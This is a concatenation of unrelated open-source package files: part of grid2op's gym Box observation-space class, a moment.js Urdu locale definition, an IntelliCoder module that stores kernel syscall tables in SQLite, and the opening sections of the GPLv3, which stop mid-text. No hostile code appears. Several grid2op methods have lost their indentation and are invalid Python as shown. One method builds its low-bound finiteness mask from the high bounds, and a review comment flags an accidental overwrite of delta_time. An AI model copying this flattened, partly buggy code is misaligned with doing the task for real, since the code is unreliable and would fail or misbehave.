                np.full(shape=(ob_sp.dim_alerts,), fill_value=-1, dtype=dt_int),
                np.full(shape=(ob_sp.dim_alerts,), fill_value=np.iinfo(dt_int).max, dtype=dt_int),
                (ob_sp.dim_alerts,),
                dt_int,
            ),
            # zero-length slice when the environment has no alert at all
            "total_number_of_alert": (
                np.full(shape=(1 if ob_sp.dim_alerts else 0,), fill_value=-1, dtype=dt_int),
                np.full(shape=(1 if ob_sp.dim_alerts else 0,), fill_value=np.iinfo(dt_int).max, dtype=dt_int),
                (1 if ob_sp.dim_alerts else 0,),
                dt_int,
            ),
            "time_since_last_attack": (
                np.full(shape=(ob_sp.dim_alerts,), fill_value=-1, dtype=dt_int),
                np.full(shape=(ob_sp.dim_alerts,), fill_value=np.iinfo(dt_int).max, dtype=dt_int),
                (ob_sp.dim_alerts,),
                dt_int,
            ),
            "was_alert_used_after_attack": (
                np.full(shape=(ob_sp.dim_alerts,), fill_value=-1, dtype=dt_int),
                np.full(shape=(ob_sp.dim_alerts,), fill_value=1, dtype=dt_int),
                (ob_sp.dim_alerts,),
                dt_int,
            ),
            "attack_under_alert": (
                np.full(shape=(ob_sp.dim_alerts,), fill_value=-1, dtype=dt_int),
                np.full(shape=(ob_sp.dim_alerts,), fill_value=1, dtype=dt_int),
                (ob_sp.dim_alerts,),
                dt_int,
            ),
        }
        # aliases kept for backward compatibility with older attribute names
        self._dict_properties["max_step"] = copy.deepcopy(self._dict_properties["current_step"])
        # NOTE(review): this overwrites the float-typed "delta_time" entry
        # defined above with an int-typed copy of "current_step" -- confirm
        # this is intended and not a copy/paste slip.
        self._dict_properties["delta_time"] = copy.deepcopy(self._dict_properties["current_step"])
        self._dict_properties["prod_p"] = copy.deepcopy(self._dict_properties["gen_p"])
        self._dict_properties["prod_q"] = copy.deepcopy(self._dict_properties["gen_q"])
        self._dict_properties["prod_v"] = copy.deepcopy(self._dict_properties["gen_v"])
        self._dict_properties["gen_p_before_curtail"] = copy.deepcopy(self._dict_properties["gen_p"])
        self._dict_properties["curtailment_limit_effective"] = copy.deepcopy(self._dict_properties[
            "curtailment_limit"
        ])
        if functs is None:
            functs = {}
        # every custom encoding must also be listed in attr_to_keep
        for key in functs.keys():
            if key not in self._attr_to_keep:
                raise RuntimeError(
                    f'The key {key} is present in the "functs" dictionary but not in the '
                    f'"attr_to_keep". This is not consistent: either ignore this function, '
                    f'in that case remove "{key}" from "functs" or you want to add '
                    f'something to your observation, in that case add it to "attr_to_keep"'
                )
        if subtract is None:
            subtract = {}
        self._subtract = subtract
        if divide is None:
            divide = {}
        self._divide = divide
        # handle the "functional" part
        self._template_obs = ob_sp._template_obj.copy()
        self.__func = {}
        self._dims = None
        low, high, shape, dtype = self._get_info(functs)
        # initialize the base container
        type(self)._BoxType.__init__(self, low=low, high=high, shape=shape, dtype=dtype)
        # convert data in `_subtract` and `_divide` to the right type
        self._fix_value_sub_div(self._subtract, functs)
        self._fix_value_sub_div(self._divide, functs)
def _get_shape(self, el, functs):
if el in functs:
callable_, low_, high_, shape_, dtype_ = functs[el]
elif el in self._dict_properties:
# el is an attribute of an observation, for example "load_q" or "topo_vect"
low_, high_, shape_, dtype_ = self._dict_properties[el]
return shape_
def _fix_value_sub_div(self, dict_, functs):
"""dict_ is either self._subtract or self._divide"""
keys = list(dict_.keys())
for k in keys:
v = dict_[k]
if isinstance(v, (list, tuple)):
v = np.array(v).astype(self.dtype)
else:
shape = self._get_shape(k, functs)
v = np.full(shape, fill_value=v, dtype=self.dtype)
dict_[k] = v
    def _get_info(self, functs):
        """Compute the (low, high, shape, dtype) of the full Box vector.

        Iterates over ``self._attr_to_keep`` (sorted order), resolving each
        attribute either through ``functs`` (custom encodings, validated
        here and registered in ``self.__func``) or through
        ``self._dict_properties``.  Bounds are concatenated, the dtype is
        promoted (bool -> int -> float) and ``self._dims`` is filled with
        the cumulative end index of each attribute's slice.

        Returns
        -------
        tuple
            ``(low, high, shape, dtype)`` suitable for the Box constructor.
        """
        low = None
        high = None
        shape = None
        dtype = None
        self._dims = []
        for el in self._attr_to_keep:
            if el in functs:
                # the attribute name "el" has been put in the functs
                try:
                    callable_, low_, high_, shape_, dtype_ = functs[el]
                except Exception as exc_:
                    raise RuntimeError(
                        f'When using keyword argument "functs" you need to provide something '
                        f"like: (callable_, low_, high_, shape_, dtype_) for each key. "
                        f'There was an error with "{el}".'
                        f"The error was:\n {exc_}"
                    )
                # probe the callable on a template observation to validate it
                # (and to infer the output shape when none was provided)
                try:
                    tmp = callable_(self._template_obs.copy())
                except Exception as exc_:
                    raise RuntimeError(
                        f'Error for the function your provided with key "{el}" (using the'
                        f'"functs" dictionary) '
                        f"The error was :\n {exc_}"
                    )
                if not isinstance(tmp, np.ndarray):
                    raise RuntimeError(
                        f'The result of the function you provided as part of the "functs"'
                        f"dictionary for key {el}"
                        f"do not return a numpy array. This is not supported."
                    )
                self.__func[el] = callable_
                if dtype_ is None:
                    dtype_ = dt_float
                if shape_ is None:
                    shape_ = tmp.shape
                if not isinstance(shape_, tuple):
                    raise RuntimeError(
                        "You need to provide a tuple as a shape of the output of your data"
                    )
                # None bounds default to +/- inf; scalar bounds are broadcast
                if low_ is None:
                    low_ = np.full(shape_, fill_value=-np.inf, dtype=dtype_)
                elif isinstance(low_, float):
                    low_ = np.full(shape_, fill_value=low_, dtype=dtype_)
                if high_ is None:
                    high_ = np.full(shape_, fill_value=np.inf, dtype=dtype_)
                elif isinstance(high_, float):
                    high_ = np.full(shape_, fill_value=high_, dtype=dtype_)
                # the probe value must already lie within the declared bounds
                if ((tmp < low_) | (tmp > high_)).any():
                    raise RuntimeError(
                        f"Wrong value for low / high in the functs argument for key {el}. Please"
                        f"fix the low_ / high_ in the tuple ( callable_, low_, high_, shape_, dtype_)."
                    )
            elif el in self._dict_properties:
                # el is an attribute of an observation, for example "load_q" or "topo_vect"
                low_, high_, shape_, dtype_ = self._dict_properties[el]
            else:
                li_keys = "\n\t-".join(
                    sorted(list(self._dict_properties.keys()) + list(self.__func.keys()))
                )
                raise RuntimeError(
                    f'Unknown observation attributes "{el}". Supported attributes are: '
                    f"\n{li_keys}"
                )
            # handle the data type
            if dtype is None:
                dtype = dtype_
            else:
                if dtype_ == dt_float:
                    # promote whatever to float anyway
                    dtype = dt_float
                elif dtype_ == dt_int and dtype == dt_bool:
                    # promote bool to int
                    dtype = dt_int
            # handle the shape (running total of the 1D vector length)
            if shape is None:
                shape = shape_
            else:
                shape = (shape[0] + shape_[0],)
            # handle low / high: rescale bounds exactly like the values will be
            if el in self._subtract:
                low_ = 1.0 * low_.astype(dtype)
                high_ = 1.0 * high_.astype(dtype)
                low_ -= self._subtract[el]
                high_ -= self._subtract[el]
            if el in self._divide:
                low_ = 1.0 * low_.astype(dtype)
                high_ = 1.0 * high_.astype(dtype)
                low_ /= self._divide[el]
                high_ /= self._divide[el]
            if low is None:
                low = low_
                high = high_
            else:
                low = np.concatenate((low.astype(dtype), low_.astype(dtype))).astype(
                    dtype
                )
                high = np.concatenate((high.astype(dtype), high_.astype(dtype))).astype(
                    dtype
                )
            # remember where this need to be stored
            self._dims.append(shape[0])
        return low, high, shape, dtype
def _handle_attribute(self, grid2op_observation, attr_nm):
res = getattr(grid2op_observation, attr_nm).astype(self.dtype)
if attr_nm in self._subtract:
res -= self._subtract[attr_nm]
if attr_nm in self._divide:
res /= self._divide[attr_nm]
return res
def to_gym(self, grid2op_observation):
"""
This is the function that is called to transform a grid2Op observation, sent by the grid2op environment
and convert it to a numpy array (an element of a gym Box)
Parameters
----------
grid2op_observation:
The grid2op observation (as a grid2op object)
Returns
-------
res: :class:`numpy.ndarray`
A numpy array compatible with the openAI gym Box that represents the action space.
"""
res = np.empty(shape=self.shape, dtype=self.dtype)
prev = 0
for attr_nm, where_to_put in zip(self._attr_to_keep, self._dims):
if attr_nm in self.__func:
tmp = self.__func[attr_nm](grid2op_observation)
elif hasattr(grid2op_observation, attr_nm):
tmp = self._handle_attribute(grid2op_observation, attr_nm)
else:
raise RuntimeError(f'Unknown attribute "{attr_nm}".')
res[prev:where_to_put] = tmp
prev = where_to_put
return res
    def close(self):
        """Close the space: this converter holds no resource, so no-op."""
        pass
def get_indexes(self, key: str) -> Tuple[int, int]:
"""Allows to retrieve the indexes of the gym action that
are concerned by the attribute name `key` given in input.
.. versionadded:: 1.9.3
.. warning::
Copy paste from box_gym_act_space, need refacto !
Parameters
----------
key : str
the attribute name (*eg* "set_storage" or "redispatch")
Returns
-------
Tuple[int, int]
_description_
Examples
--------
You can use it like:
.. code-block:: python
gym_env = ... # an environment with a BoxActSpace
act = np.zeros(gym_env.action_space.shape)
key = "redispatch" # "redispatch", "curtail", "set_storage"
start_, end_ = gym_env.action_space.get_indexes(key)
act[start_:end_] = np.random.uniform(high=1, low=-1, size=env.gen_redispatchable.sum())
# act only modifies the redispatch with the input given (here a uniform redispatching between -1 and 1)
"""
error_msg =(f"Impossible to use the grid2op action property \"{key}\""
f"with this action space.")
if key not in self._attr_to_keep:
raise Grid2OpException(error_msg)
prev = 0
for attr_nm, where_to_put in zip(
self._attr_to_keep, self._dims
):
if attr_nm == key:
return prev, where_to_put
prev = where_to_put
raise Grid2OpException(error_msg)
def normalize_attr(self, attr_nm: str):
"""
This function normalizes the part of the space
that corresponds to the attribute `attr_nm`.
The normalization consists in having a vector between 0. and 1.
It is achieved by:
- dividing by the range (high - low)
- adding the minimum value (low).
.. note::
It only affects continuous attribute. No error / warnings are
raised if you attempt to use it on a discrete attribute.
.. warning::
This normalization relies on the `high` and `low` attribute. It cannot be done if
the attribute is not bounded (for example when its maximum limit is `np.inf`). A warning
is raised in this case.
Parameters
----------
attr_nm : `str`
The name of the attribute to normalize
"""
if attr_nm in self._divide or attr_nm in self._subtract:
raise Grid2OpException(
f"Cannot normalize attribute \"{attr_nm}\" that you already "
f"modified with either `divide` or `subtract` (observation space)."
)
prev = 0
if self.dtype != dt_float:
raise Grid2OpException(
"Cannot normalize attribute with a observation "
"space that is not float !"
)
for attr_tmp, where_to_put in zip(self._attr_to_keep, self._dims):
if attr_tmp == attr_nm:
curr_high = 1.0 * self.high[prev:where_to_put]
curr_low = 1.0 * self.low[prev:where_to_put]
finite_high = np.isfinite(curr_high)
finite_low = np.isfinite(curr_high)
both_finite = finite_high & finite_low
both_finite &= curr_high > curr_low
if (~both_finite).any():
warnings.warn(f"The normalization of attribute \"{both_finite}\" cannot be performed entirely as "
f"there are some non finite value, or `high == `low` "
f"for some components.")
self._divide[attr_nm] = np.ones(curr_high.shape, dtype=self.dtype)
self._subtract[attr_nm] = np.zeros(curr_high.shape, dtype=self.dtype)
self._divide[attr_nm][both_finite] = (
curr_high[both_finite] - curr_low[both_finite]
)
self._subtract[attr_nm][both_finite] += curr_low[both_finite]
self.high[prev:where_to_put][both_finite] = 1.0
self.low[prev:where_to_put][both_finite] = 0.0
break
prev = where_to_put
# Build the concrete observation-space classes by mixing the aux
# implementation with whichever gym flavour(s) are installed.  When both
# legacy "gym" and "gymnasium" are present, the gymnasium variant is
# assigned last and therefore wins the ``BoxGymObsSpace`` alias.
if GYM_AVAILABLE:
    # legacy "gym" flavour
    from gym.spaces import Box as LegGymBox
    from grid2op.gym_compat.base_gym_attr_converter import BaseLegacyGymAttrConverter

    BoxLegacyGymObsSpace = type("BoxLegacyGymObsSpace",
                                (__AuxBoxGymObsSpace, LegGymBox, ),
                                {"_gymnasium": False,
                                 "_BaseGymAttrConverterType": BaseLegacyGymAttrConverter,
                                 "_BoxType": LegGymBox,
                                 "__module__": __name__})
    BoxLegacyGymObsSpace.__doc__ = __AuxBoxGymObsSpace.__doc__
    BoxGymObsSpace = BoxLegacyGymObsSpace
    BoxGymObsSpace.__doc__ = __AuxBoxGymObsSpace.__doc__

if GYMNASIUM_AVAILABLE:
    # "gymnasium" flavour (preferred when available)
    from gymnasium.spaces import Box
    from grid2op.gym_compat.base_gym_attr_converter import BaseGymnasiumAttrConverter

    BoxGymnasiumObsSpace = type("BoxGymnasiumObsSpace",
                                (__AuxBoxGymObsSpace, Box, ),
                                {"_gymnasium": True,
                                 "_BaseGymAttrConverterType": BaseGymnasiumAttrConverter,
                                 "_BoxType": Box,
                                 "__module__": __name__})
    BoxGymnasiumObsSpace.__doc__ = __AuxBoxGymObsSpace.__doc__
    BoxGymObsSpace = BoxGymnasiumObsSpace
    BoxGymObsSpace.__doc__ = __AuxBoxGymObsSpace.__doc__
/Flask_AdminLTE3-1.0.9-py3-none-any.whl/flask_adminlte3/static/plugins/moment/locale/ur.js |
//! moment.js Urdu (ur) locale configuration.
// UMD wrapper: load moment through CommonJS or AMD when available,
// otherwise pick it up from the global object.
;(function (global, factory) {
   typeof exports === 'object' && typeof module !== 'undefined'
       && typeof require === 'function' ? factory(require('../moment')) :
   typeof define === 'function' && define.amd ? define(['../moment'], factory) :
   factory(global.moment)
}(this, (function (moment) { 'use strict';

    //! moment.js locale configuration

    // Gregorian month names in Urdu script; the same array serves both the
    // long ("months") and abbreviated ("monthsShort") forms.  Likewise the
    // weekday names are reused for all three weekday lengths.
    var months = [
        'جنوری',
        'فروری',
        'مارچ',
        'اپریل',
        'مئی',
        'جون',
        'جولائی',
        'اگست',
        'ستمبر',
        'اکتوبر',
        'نومبر',
        'دسمبر',
    ],
        days = ['اتوار', 'پیر', 'منگل', 'بدھ', 'جمعرات', 'جمعہ', 'ہفتہ'];

    var ur = moment.defineLocale('ur', {
        months: months,
        monthsShort: months,
        weekdays: days,
        weekdaysShort: days,
        weekdaysMin: days,
        longDateFormat: {
            LT: 'HH:mm',
            LTS: 'HH:mm:ss',
            L: 'DD/MM/YYYY',
            LL: 'D MMMM YYYY',
            LLL: 'D MMMM YYYY HH:mm',
            LLLL: 'dddd، D MMMM YYYY HH:mm',
        },
        // "صبح" = morning (AM), "شام" = evening (PM)
        meridiemParse: /صبح|شام/,
        isPM: function (input) {
            return 'شام' === input;
        },
        meridiem: function (hour, minute, isLower) {
            if (hour < 12) {
                return 'صبح';
            }
            return 'شام';
        },
        calendar: {
            sameDay: '[آج بوقت] LT',
            nextDay: '[کل بوقت] LT',
            nextWeek: 'dddd [بوقت] LT',
            lastDay: '[گذشتہ روز بوقت] LT',
            lastWeek: '[گذشتہ] dddd [بوقت] LT',
            sameElse: 'L',
        },
        relativeTime: {
            future: '%s بعد',
            past: '%s قبل',
            s: 'چند سیکنڈ',
            ss: '%d سیکنڈ',
            m: 'ایک منٹ',
            mm: '%d منٹ',
            h: 'ایک گھنٹہ',
            hh: '%d گھنٹے',
            d: 'ایک دن',
            dd: '%d دن',
            M: 'ایک ماہ',
            MM: '%d ماہ',
            y: 'ایک سال',
            yy: '%d سال',
        },
        // Urdu text uses the Arabic comma "،"; normalize it to "," before
        // parsing and convert back when formatting.
        preparse: function (string) {
            return string.replace(/،/g, ',');
        },
        postformat: function (string) {
            return string.replace(/,/g, '،');
        },
        week: {
            dow: 1, // Monday is the first day of the week.
            doy: 4, // The week that contains Jan 4th is the first week of the year.
        },
    });

    return ur;

})));
/IntelliCoder-0.5.2.tar.gz/IntelliCoder-0.5.2/intellicoder/database.py | from logging import getLogger
import re
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, String, Integer
from sqlalchemy import create_engine
from sqlalchemy import and_, or_
from sqlalchemy.orm import sessionmaker
from more_itertools import chunked
from .init import _
from .utils import remove_false
# NOTE: the name ``logging`` is deliberately rebound from the stdlib module
# to this module's logger (only ``getLogger`` was imported above), so
# ``logging.debug(...)`` below logs through this module's logger.
logging = getLogger(__name__)

# SQLAlchemy declarative base and session factory shared by the models below.
Base = declarative_base()
Session = sessionmaker()
class Database(object):
    """SQLite database of system-call table entries and declarations,
    accessed through SQLAlchemy."""

    def __init__(self, filename):
        # Open (or create) the SQLite file, create any missing tables and
        # bind a fresh session to the engine.
        self.filename = filename
        self.engine = create_engine('sqlite:///{}'.format(filename))
        Base.metadata.create_all(self.engine)
        Session.configure(bind=self.engine)
        self.session = Session()

    def query_item(self, key, abis):
        """Query items based on system call number or name."""
        # Interpret ``key`` first as a decimal number, then as hexadecimal,
        # and finally fall back to treating it as a syscall name.
        try:
            key = int(key)
            field = 'number'
        except ValueError:
            try:
                key = int(key, 16)
                field = 'number'
            except ValueError:
                field = 'name'
        # match the key AND any one of the requested ABIs
        arg = and_(getattr(Item, field) == key,
                   or_(Item.abi == abi for abi in abis))
        return self.session.query(Item).filter(arg).all()

    def query_decl(self, **kwargs):
        """Query declarations, filtering by the given column values."""
        return self.session.query(Decl).filter_by(**kwargs).all()

    def add_data(self, filenames):
        """Add data.

        ``filenames`` is an iterable of open file-like objects (with
        ``name`` and ``read()``): ``*.tbl`` syscall tables become
        :class:`Item` rows, anything else is treated as grep output of
        ``SYSCALL_DEFINE`` declarations and becomes :class:`Decl` rows.
        """
        def _parse_table(table):
            # Parse a kernel ``*.tbl`` file: one tab-separated record per
            # line; data lines start with the (decimal) syscall number.
            def _parse_line(line):
                return line.split('\t')
            lines = (_parse_line(one) for one in table.splitlines()
                     if re.match(r'^\d', one))
            return (remove_false(one) for one in lines)

        def _parse_decl(decl):
            # ``decl`` looks like ``SYSCALL_DEFINE3(name, args...)``: the
            # character right after "SYSCALL_DEFINE" is the argument count;
            # the parenthesized remainder is name plus type/name tokens.
            index = len('SYSCALL_DEFINE')
            argc = decl[index]
            rest = decl[index + 1:][1:-1].split(',')
            name = rest[0]
            # args = [one.strip() for one in rest[1:]]
            args = ','.join(rest[1:])
            return name, argc, args

        # NOTE: this ``_parse_line`` (for "file:decl" grep output) shadows
        # the name of the inner helper used by ``_parse_table`` above; the
        # two operate on different inputs and never interact.
        def _parse_line(line):
            index = line.find(':')
            if index == -1:
                raise RuntimeError('This is unexpected: %s', line)
            filename = line[:index]
            decl = line[index + 1:]
            return filename, _parse_decl(decl)

        def _split_into_lines(grep_output):
            # Re-join declarations that grep wrapped over continuation lines.
            lines = grep_output.replace('\n\n', '\n')
            lines = lines.replace('\n\t', '').replace('\t', ' ')
            return lines.strip().splitlines()

        for one in filenames:
            if one.name.endswith('.tbl'):
                for item in _parse_table(one.read()):
                    args = list(item)
                    if len(args) != 5:
                        # pad short records so all five columns exist
                        args += [''] * (5 - len(args))
                    self.session.add(
                        Item(name=args[2], abi=args[1],
                             number=args[0], entry=args[3],
                             compat=args[4]))
            else:
                for line in _split_into_lines(one.read()):
                    filename, rest = (_parse_line(line))
                    self.session.add(
                        Decl(name=rest[0], filename=filename,
                             argc=rest[1], args=rest[2]))
        self.session.commit()
class Item(Base):
    """One record of a kernel system-call table (``*.tbl``) file."""

    __tablename__ = 'items'

    item_id = Column(Integer, primary_key=True)
    name = Column(String, index=True)
    abi = Column(String)
    number = Column(Integer)
    entry = Column(String)
    compat = Column(String)

    def __repr__(self):
        # single literal instead of implicit concatenation; same output
        layout = ('<Item(item_id={0.item_id}, name={0.name}, abi={0.abi}, '
                  'number={0.number}, entry={0.entry}, compat={0.compat})>')
        return layout.format(self)
class Decl(Base):
    """A system-call declaration extracted from kernel sources."""

    __tablename__ = 'decls'

    decl_id = Column(Integer, primary_key=True)
    name = Column(String, index=True)
    filename = Column(String)
    argc = Column(Integer)
    args = Column(String)

    def decl(self):
        """Render this record as a C prototype string."""
        logging.debug(_('args: %s'), self.args)
        pieces = self.args.strip().replace('__user ', '').split(',')
        logging.debug(_('args: %s'), pieces)
        # type and name tokens alternate in ``pieces``: glue them in pairs
        # (a trailing unpaired token is kept as-is)
        pairs = [''.join(pieces[i:i + 2]) for i in range(0, len(pieces), 2)]
        return 'long {}({});'.format(self.name.strip(), ', '.join(pairs))

    def __repr__(self):
        return ('<Decl(name={0.name}, filename={0.filename}, '
                'argc={0.argc}, args={0.args})>').format(self)
/IHEWAcollect-0.0.31.tar.gz/IHEWAcollect-0.0.31/LICENSE.rst | GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The GNU General Public License is a free, copyleft license for
software and other kinds of works.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users. We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors. You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights. Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received. You must make sure that they, too, receive
or can get the source code. And you must show them these terms so they
know their rights.
Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you legal permission to copy, distribute and/or modify it.
For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software. For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.
Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so. This is fundamentally incompatible with the aim of
protecting users' freedom to change the software. The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable. Therefore, we
have designed this version of the GPL to prohibit the practice for those
products. If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.
Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary. To prevent this, the GPL assures that
patents cannot be used to render the program non-free.
The precise terms and conditions for copying, distribution and
modification follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this
License. Each licensee is addressed as "you". "Licensees" and
"recipients" may be individuals or organizations.
To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy. The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.
A "covered work" means either the unmodified Program or a work based
on the Program.
To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy. Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.
To "convey" a work means any kind of propagation that enables other
parties to make or receive copies. Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.
An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License. If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.
1. Source Code.
The "source code" for a work means the preferred form of the work
for making modifications to it. "Object code" means any non-source
form of a work.
A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.
The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form. A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.
The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities. However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work. For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.
The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.
The Corresponding Source for a work in source code form is that
same work.
2. Basic Permissions.
All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met. This License explicitly affirms your unlimited
permission to run the unmodified Program. The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work. This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.
You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force. You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright. Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.
Conveying under any other circumstances is permitted solely under
the conditions stated below. Sublicensing is not allowed; section 10
makes it unnecessary.
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.
When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.
4. Conveying Verbatim Copies.
You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.
You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.
5. Conveying Modified Source Versions.
You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:
a) The work must carry prominent notices stating that you modified
it, and giving a relevant date.
b) The work must carry prominent notices stating that it is
released under this License and any conditions added under section
7. This requirement modifies the requirement in section 4 to
"keep intact all notices".
c) You must license the entire work, as a whole, under this
License to anyone who comes into possession of a copy. This
License will therefore apply, along with any applicable section 7
additional terms, to the whole of the work, and all its parts,
regardless of how they are packaged. This License gives no
permission to license the work in any other way, but it does not
invalidate such permission if you have separately received it.
d) If the work has interactive user interfaces, each must display
Appropriate Legal Notices; however, if the Program has interactive
interfaces that do not display Appropriate Legal Notices, your
work need not make them do so.
A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit. Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.
6. Conveying Non-Source Forms.
You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:
a) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by the
Corresponding Source fixed on a durable physical medium
customarily used for software interchange.
b) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by a
written offer, valid for at least three years and valid for as
long as you offer spare parts or customer support for that product
model, to give anyone who possesses the object code either (1) a
copy of the Corresponding Source for all the software in the
product that is covered by this License, on a durable physical
medium customarily used for software interchange, for a price no
more than your reasonable cost of physically performing this
conveying of source, or (2) access to copy the
Corresponding Source from a network server at no charge.
c) Convey individual copies of the object code with a copy of the
written offer to provide the Corresponding Source. This
alternative is allowed only occasionally and noncommercially, and
only if you received the object code with such an offer, in accord
with subsection 6b.
d) Convey the object code by offering access from a designated
place (gratis or for a charge), and offer equivalent access to the
Corresponding Source in the same way through the same place at no
further charge. You need not require recipients to copy the
Corresponding Source along with the object code. If the place to
copy the object code is a network server, the Corresponding Source
may be on a different server (operated by you or a third party)
that supports equivalent copying facilities, provided you maintain
clear directions next to the object code saying where to find the
Corresponding Source. Regardless of what server hosts the
Corresponding Source, you remain obligated to ensure that it is
available for as long as needed to satisfy these requirements.
e) Convey the object code using peer-to-peer transmission, provided
you inform other peers where the object code and Corresponding
Source of the work are being offered to the general public at no
charge under subsection 6d.
A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.
A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling. In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage. For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product. A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.
"Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source. The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.
If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information. But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).
The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
the User Product in which it has been modified or installed. Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.
